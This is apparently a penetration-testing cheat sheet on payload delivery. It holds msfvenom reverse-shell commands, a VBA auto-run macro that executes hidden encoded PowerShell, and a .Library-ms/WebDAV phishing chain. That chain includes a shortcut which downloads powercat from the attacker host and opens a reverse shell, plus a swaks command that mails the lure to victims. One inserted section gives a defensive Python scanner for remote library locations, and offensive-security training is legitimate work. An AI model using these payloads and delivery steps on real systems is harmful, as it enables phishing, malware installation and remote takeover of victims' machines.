Payload Delivery

Shellcode Generation (msfvenom)

Basic Syntax

msfvenom -p windows/shell_reverse_tcp LHOST=$kaliIP LPORT=443 -f powershell -v sc

msfvenom -p $payload LHOST=$kaliIP LPORT=$port EXITFUNC=THREAD -f $format -a $arch --platform $platform -e $encoder > $filename

Common Payloads

# Windows x64 reverse shell (exe)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$kaliIP LPORT=443 -f exe -o shell.exe

# Windows x64 reverse shell (PowerShell)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$kaliIP LPORT=443 -f powershell -v sc

# Windows reverse shell (DLL for DLL hijacking)
msfvenom -p windows/x64/shell/reverse_tcp LHOST=$kaliIP LPORT=4444 -f dll -o msf.dll

# Windows MSI (for AlwaysInstallElevated)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$kaliIP LPORT=$port -f msi -o malicious.msi

# Linux reverse shell (ELF)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$kaliIP LPORT=443 -f elf -o shell.elf

Encoding Shellcode for Macro Embedding

Use the -f powershell format, then encode the resulting command as base64:

msfvenom -p windows/shell_reverse_tcp LHOST=$kaliIP LPORT=443 -f powershell -v sc

Then in PowerShell:

$str = "powershell.exe -nop -w hidden -e <base64>"

Python helper to split the long string into chunks for the macro:

# Full encoded command (the "..." stands for the rest of the base64 blob)
cmd = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."
n = 50  # characters per VBA line, well under the VBA string-literal limit
for i in range(0, len(cmd), n):
    # Emit one VBA concatenation line per chunk
    print('Str = Str + "' + cmd[i:i + n] + '"')

Microsoft Office Macros

VBA Macro Template

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    ' ... continue split string ...
    Str = Str + "A== "
    CreateObject("Wscript.Shell").Run Str
End Sub

  • AutoOpen() triggers when the file is opened via the file system
  • Document_Open() triggers when opened via the Word Application object
  • Payload is split into chunks to avoid detection/length limits
  • Use the Python helper above to generate the split string

Windows Library Files (.Library-ms)

Windows Library files connect users to data stored in remote locations such as WebDAV shares or web services. Serving the payload from WebDAV instead of attaching it directly helps the delivery get past spam filters.

Attack Flow

  1. Create a WebDAV share on Kali hosting a malicious .lnk file
  2. Create a config.Library-ms file pointing to the WebDAV share
  3. Send the .Library-ms to the victim (via email, etc.)
  4. Victim opens the library file → sees your WebDAV directory → clicks the .lnk file → shell

Step 1: Set Up WebDAV Server (Kali)

mkdir /home/kali/webdav
touch /home/kali/webdav/test.txt
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav

Step 2: Create config.Library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://$kaliIP</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Replace $kaliIP with your Kali IP. Save as config.Library-ms.
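From the defender's side, a .Library-ms attachment is easy to flag because the remote location is visible in plain XML. The following Python scanner is an added example (not part of these notes): it parses a library file with the structure above and reports any search connector whose simpleLocation points off-host (http/https URL or UNC path). The sample documents and the host 203.0.113.10 are constructed placeholders.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Namespace used by Windows Library description files (from the template above).
NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}


def remote_locations(library_xml: str) -> list[str]:
    """Return every simpleLocation URL in a .Library-ms document that points
    off-host (http/https URL or a UNC path). Local folder paths are ignored."""
    root = ET.fromstring(library_xml)
    found = []
    path = ".//lib:searchConnectorDescription/lib:simpleLocation/lib:url"
    for url_el in root.iterfind(path, NS):
        loc = (url_el.text or "").strip()
        if not loc:
            continue
        scheme = urlparse(loc).scheme.lower()
        if scheme in ("http", "https") or loc.startswith("\\\\"):
            found.append(loc)
    return found


def is_suspicious_library(library_xml: str) -> bool:
    """True when opening the library would make Explorer fetch its contents from a remote host."""
    return len(remote_locations(library_xml)) > 0


# Constructed sample mirroring the template on this page (placeholder host, not a real indicator).
SAMPLE_REMOTE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation><url>http://203.0.113.10</url></simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>"""

# Constructed benign sample: the same library backed by a local folder.
SAMPLE_LOCAL = SAMPLE_REMOTE.replace("http://203.0.113.10", "C:\\Users\\Public\\Documents")

if __name__ == "__main__":
    for label, doc in (("remote", SAMPLE_REMOTE), ("local", SAMPLE_LOCAL)):
        print(label, is_suspicious_library(doc), remote_locations(doc))
```

The same check can run as a mail-gateway or EDR content filter on any attachment with the .Library-ms extension.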


WebDAV + LNK Payloads

Step 3: Create the .lnk Shortcut (on Windows)

  1. Right-click Desktop → New → Shortcut
  2. Target command:
    powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://$kaliIP/powercat.ps1'); powercat -c $kaliIP -p 4444 -e powershell"
  3. Save with a convincing name (e.g., “Important Document.lnk”)
  4. Copy to /home/kali/webdav/

Also serve powercat.ps1 over port 80 and start a listener on port 4444.

Step 4: Deliver via Email (Swaks)

sudo swaks -t victim@domain.com -t victim2@domain.com \
  --from attacker@domain.com \
  --attach @config.Library-ms \
  --server $mailServerIP \
  --body @body.txt \
  --header "Subject: Example Email" \
  --suppress-data \
  -ap

  • -t = to recipient(s)
  • --attach = attach the library file
  • --suppress-data = summarize the DATA portion of the SMTP transaction instead of printing it
  • -ap = supply the SMTP authentication password (prompts for it if no value is given)